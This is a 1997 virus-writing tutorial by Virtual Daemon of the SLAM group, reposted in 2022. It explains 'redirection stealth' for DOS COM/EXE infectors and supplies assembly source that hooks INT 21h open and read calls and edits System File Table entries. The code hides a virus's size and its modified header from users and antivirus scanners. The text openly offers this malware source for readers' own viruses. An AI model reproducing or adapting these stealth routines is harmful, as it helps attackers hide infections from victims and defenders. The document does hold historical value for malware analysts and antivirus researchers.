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SLAM4.017: Stealth Tutorial - Redirection Stealth by Virtual Daemon/SLAM

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 · 3 Mar 2022

| Simple Tutorial to Stealth Viruses |
| Part #4 - Redirection Stealth |
| by Virtual Daemon |

Part I: Introduction & Theory

This is my 4th attempt to try to present you how stealth techniques can be used in your viruses. I already covered (I hope) by now some important topics of what we call "stealth methods". Since we already talked about the size stealth method and the so-called "full stealth on disk" method, I think it's time to check out something a little more advanced then that...

Well, I will try to present you in this tutorial the redirection stealth method. Also known as "true full stealth" or as "full stealth in memory", this technique is one of the best file related stealth methods ever known.

But why is it called "redirection stealth"? Well, it's very simple... To redirect something means to change it's direction. In conclusion, we will redirect all the reads to infected bytes to uninfected ones.

Let me give you a little example... Let's say you have a COM infector that will modify the first 3 bytes of the infected program with a JMP instruction to the virus body. We have to hide those 3 bytes so our presence won't be detected. So when someone is trying to read those bytes, we will intercept the call and we'll give him instead of those bytes the original 3 bytes. We can do that by overwriting in memory the 3 bytes read by the specified program with our 3 original bytes.

In order to fully understand this method, you must know what SFT is and what is the SFT structure. I already presented the SFT structure in the 2nd part of this stealth tutorial guides... Anyway, so you won't bother right now to search for that tutorial,I will show ya again those 2 nice tables I love...:)

System File Table (on short SFT) is a DOS data structure used to maintain the state of an open file. Here is the SFT from DOS v4+ structure:

| Offset | Size | Description |
| 0h | DWord | Pointer to next system file table. |
| | | Offset ffffh indicates last table in chain |
| 4h | Word | Number of file descriptors in table. |
| 6h | 3Bh bytes | File descriptor table (59 bytes for every |
| | | handle). |

The file descriptor table is an array of 3Bh (59) bytes. Here is its content:

| Offset | Size | Description |
| 0h | Word | Number of file handles reffering to this file or |
| | | zero if file is no longer open. FFFFh if in use |
| | | but not reference. |
| 2h | Word | File open mode. Bit 15 set if file has been opened|
| | | via FCB. |
| 4h | Byte | File attributes. |
| 5h | Word | Device info word: |
| | | bit 15 set if remote file |
| | | bit 14 set = don't set file date/time on closing |
| | | bit 13 set if named pipe |
| | | bit 12 set if no inherit |
| | | bit 11 set if network spooler |
| | | bit 7 set if device,clear if file (only local) |
| | | bits 6-0 as for AX=4400h |
| 7h | DWord | Pointer to device driver header if char device, |
| | | else pointer to DOS Drive Parameter Block or |
| | | REDIR data. |
| 0Bh | Word | Starting cluster of file (local files only). |
| 0Dh | Word | File time in packed format. |
| 0Fh | Word | File date in packed format. |
| 11h | DWord | File size. |
| 15h | DWord | Curent file position (offset in file). |
| | Local file | |
| 19h | Word | Relative cluster within file of last cluster |
| | | accessed. |
| 1Bh | DWord | Number of sector containing directory entry. |
| 1Fh | Byte | Number of dir entry within sector (byte offset/32)|
| | Network redirector | |
| 19h | DWord | Pointer to REDIRIFS record. |
| 1Dh | 3 BYTEs| ??? |
| 20h |11 BYTEs| Filename in FCB format. |
| 2Bh | DWord | SHARE pointer to previous SFT sharing same file. |
| 2Fh | Word | SHARE network machine number which opened file. |
| 31h | Word | PSP segment of file owner. |
| 33h | Word | Offset within SHARE code seg of sharing record. |
| | | 0000h = none |
| 35h | Word | Absolute cluster number of last cluster accessed. |
| | | Zero if file has never been read or written. |
| 37h | DWord | Pointer to IFS driver for file, 0 if native DOS. |

That is the SFT structure. Anyway, you have to remember that SFTs aren't very compatible with Novell Networks or with Windoze 95. But, we all have to start somewhere, don't we? ;)

The theory of redirection stealth is quite simple... And it's very easy to implement it since we can use the same procedures for EXE infections as for COM infections.

The EXE redirection can be done in two ways... One of them would be to save somewhere *ONLY* the modified bytes from beginning, like CS, IP, PartPag or PageCnt (or you could recalculate them in memory ;) and then to put them in memory instead of the infected/modified bytes when a read call to the beginning of file is intercepted. The second method is a little easier than the first one and it should be used more often if you are dealing with COM/EXE viruses. It consist in saving the WHOLE EXE header (1ch bytes) into a buffer in your virus and then restore all those 1ch bytes when a read call to the beginning of file is intercepted. I will only present here the second method because I personally consider it easier then the first one... and my goal is to make you understand what's going on around here, right? ;)

Since our goal is to hide our virus in the host system (so we won't get detected by the user or by AV programs), we will use two steps:

  • hide the virus body from the end of the file
  • hide the modified bytes from the beginning of file (if EXE the whole header)

But when are we going to hide those bytes?

Well, as you probably already guessed there is only one way to check the bytes from a file: by READing them. So, if an AV program wants to see if a file is infected with a virus, the AV will open the file and then read from it. Since we must replace those "infected" bytes with the original ones (in memory) so we won't get detected, we will have to intercept the DOS read function (AH=3Fh) before the AV tries to scan the file. This is practically the second step. The first one would be to hide the virus body from EOF. Well, if you read the second tutorial from this set of stealth related tuts, you already know how to do it: by intercepting 3Dh (open file) and 6Ch (extended open) and by subtracting the size of our virus from the filesize variable located at offset 11h in SFT.

Well, in conclusion, we will have to intercept the DOS open functions and the read function...

Here's how the int 21h handler will look like:

cmp ah,3dh ;open file?
je open_file
cmp ax,6c00h ;extended open?
je open_file
cmp ah,3fh ;read from file?
je read_file
... ;other stuff
db 0eah ;jump to old int 21h
oldint21 dd ?

Part II: Source code examples

I will first present the procedure that will be executed when the open functions (3dh and 6c00h) are trapped. It's exactly the same as the one presented in my size stealth tut #2.

Note: the seconds must be set to 4 when the virus infects the file. This is our marking sign...

--- cut here --- 
pushf ;fake an INT 21h call so we can get the
call dword ptr cs:[oldint21] ;handle (CF will be set if error)
jc exit ;if error, exit

cmp ax,5 ;check to see if the handle is a special device
jb damn ;oups... it's a special device... exit!

push ax bx di es ;save general registers on stack

xchg bx,ax ;save the handle in BX
push bx ;save file handle on stack
mov ax,1220h ;DOS function=get job file table entry
int 2fh ;CF will be set if error
jc noway ;Error? Exit, please...

mov bl,es:[di] ;put the JFT entry on BL
cmp bl,0ffh ;if BL=0ffh, handle is not open
je noway ;handle not open? Exit please...
mov ax,1216h ;DOS function=get adress of SFT entry
int 2fh ;CF will be set if error
jc noway ;Error: BX is greater then FILES= (Config.Sys)

cmp word ptr es:[di+28h],'OC' ;check if the file is really a COM
jne check_exe ;if not COM check for EXE
cmp word ptr es:[di+28h+2],'M'
jne check_exe
jmp found ;COM file found
cmp word ptr es:[di+28h],'XE' ;check if the file is really a EXE
jne noway ;no EXE and no COM? Pfuu... Exit then
cmp word ptr es:[di+28h+2],'E'
jne noway
mov ax,es:[di+0dh] ;get time from SFT
and al,1fh ;test if infected
cmp al,2 ;seconds number must be set to 4 on infected files
jne noway ;not infected? exit...

cmp word ptr es:[di],1 ;check if file has already been opened
ja noway ;too bad! We can't stealth it...
sub word ptr es:[di+11h],(heap-begin) ;subtract the size of our virus
sbb word ptr es:[di+13h],0 ;subtract the high word too
pop bx ;restore file handle from stack
pop es di bx ax ;restore registers from stack
retf 2 ;return
--- cut here ---

So, when the file gets opened, we will execute first this procedure and then we'll restore control to the original function. This way, we will hide the size of our virus from open calls.

Here comes the second part... the procedure that will hide the modified bytes (JMP to our virus in case of COM infections, or the modified values from the EXE header in case of EXE infections) from the beginning of file.

The theory behind it it's very simple: intercept the 3fh function, check if a read to the beginning of file is made, and if so replace the read bytes with our original bytes in memory.

Note that the code isn't optimized for size... It's expanded on purpose, just to be better understood... Anywayz, it's very easy to make it smaller. :)

--- cut here --- 
cmp bx,5 ;check the file handle to see if its a special device
jae continue ;if bigger or equal to 5, its just a normal file
jmp read_exit
push ax bx cx di si es ;save registers on stack

push bx ;save file handle on stack
mov ax,1220h ;DOS function=get job file table entry
int 2fh ;CF will be set if error
jnc noerr1
pop bx
jmp no_read ;Error? Exit, please...
mov bl,es:[di] ;put the JFT entry on BL
cmp bl,0ffh ;if BL=0ffh, handle is not open
je finish

mov ax,1216h ;DOS function=get adress of SFT entry
int 2fh ;CF will be set if error
jc finish ;Error: BX is greater then FILES= (Config.Sys)
pop bx ;restore the file handle from stack

cmp word ptr es:[di+28h],'OC' ;check if the file is really a COM
jne maybe_exe ;if not COM check for EXE
cmp word ptr es:[di+28h+2],'M'
jne maybe_exe
jmp vdrulz ;COM file found
cmp word ptr es:[di+28h],'XE' ;check if the file is really a EXE
je firstfound
jmp no_read ;no EXE and no COM? Pfuu... Exit then
cmp word ptr es:[di+28h+2],'E'
je vdrulz
jmp no_read
mov ax,word ptr es:[di+0dh] ;check file's time too see if infected
and al,1fh ;if the file's seconds are set to 4
cmp al,2 ;then the file is infected with our virus
je infected
jmp no_read ;this file isn't infected with our virus... :(
cmp word ptr es:[di+17h],0 ;check to see if the file pointer is in the
;first 64K of the file
je coolio ;yeps... its here alright! :)
jmp no_read
cmp word ptr es:[di+15h],1ch ;check to see if the file pointer is in the
;first 1ch (=28) bytes of the file
jb huray ;if in the first 1ch, continue
jmp no_read
mov ax,word ptr es:[di+15h] ;store the file pointer in ax
push ax ;save it

mov ah,3fh ;fake a 3Fh (read) call
pushf ;will return in AX the number of bytes
call dword ptr cs:[oldint21] ;actually read

pop cx ;restore the file pointer (CX contains the number of bytes
;between the beginning and the file pointer's position)
;Note that this value is smaller then 1ch
push ax ;save the number of bytes actually read
;(returned by the fake read call)
sub cx,1ch ;subtract the size of our buffer (original bytes)
;CX will contain the difference between the size of our buffer (1ch) and the
;number of the bytes between beginning and the file pointer's location
neg cx ;make it positive bcoz XX-1ch<0 , where XX=number of bytes
;from beginning to the file pointer
cmp ax,cx ;compare the number of bytes read with our value
jae kewl ;if bigger or equal, then CX holds the number of bytes
xchg ax,cx ;if not put em in CX
;DS:DX contains the address of the buffer to receive data from the previous
;3fh call
push cx dx ds ;save the number of bytes and the address of buffer for
;later use

mov ax,word ptr es:[di+15h]
push ax ;save the file pointer (high and low words)
mov ax,word ptr es:[di+17h]
push ax

add word ptr es:[di+11h],(heap-begin) ;make our virus "visible"
adc word ptr es:[di+13h],0 ;by adding its size to the size of the file
mov ax,word ptr es:[di+11h] ;get the current size
sub ax,1ch ;subtract the size of our buffer

mov word ptr es:[di+15h],ax ;go to the end of the file-size of buffer
mov ax,word ptr es:[di+13h]
mov word ptr es:[di+17h],ax

push cs
pop ds ;make DS=CS
lea dx,header ;read from our buffer (where the original bytes are stored)
mov cx,1ch ;read 1ch bytes
mov ah,3fh ;fake an read call to read the original bytes
pushf ;stored in our virus, that will replace the bytes
call dword ptr cs:[oldint21] ;from the beginning of file

sub word ptr es:[di+11h],(heap-begin) ;hide the virus body by
sbb word ptr es:[di+13h],0 ;subtracting the size of our virus from the
;file size

pop ax ;restore the file pointer (low and high words)
mov word ptr es:[di+17h],ax
pop ax
mov word ptr es:[di+15h],ax

pop ds dx cx ;restore the number of bytes and the address of buffer
push ds
pop es ;make ES=DS

mov di,dx ;DI=DX=offset of buffer
lea si,header ;SI=offset of header (where the original bytes
;are stored)
push cs
pop ds ;make DS=CS
rep movsb ;move bytes in memory (CX holds the number of bytes)

push es
pop ds ;make DS=ES

pop ax ;restore the number of bytes actually read
pop es si di cx bx es ;restore registers from stack (ES will be
;overwriten by AX)
clc ;clear carry flag (set CF to 0)
retf 2 ;return far
pop es si di cx bx ax ;restore general registers from stack
jmp exithandler ;return to original INT21h handler

header db 1ch dup (?)
--- cut here ---

Note that "heap" marks the end of the virus, "begin" the beginning of the virus and "header" is an array of bytes (1ch bytes=size of EXE header).

Huray!!! You have reached the end of this phile... :) That's the whole shit... simple, isn't it? ;) Well, from now on you will be able to hide your virus properly from ANY infected file. I wish you good luck!

That is the end (I think) of my file related stealth methods. Greetings goes out to Mnemonix (he was one of the first coders that "discovered" this method), SLAM, FS and to all the other living creatures out there.

Well, till next time... byez!

Virtual Daemon / SLAM 1997

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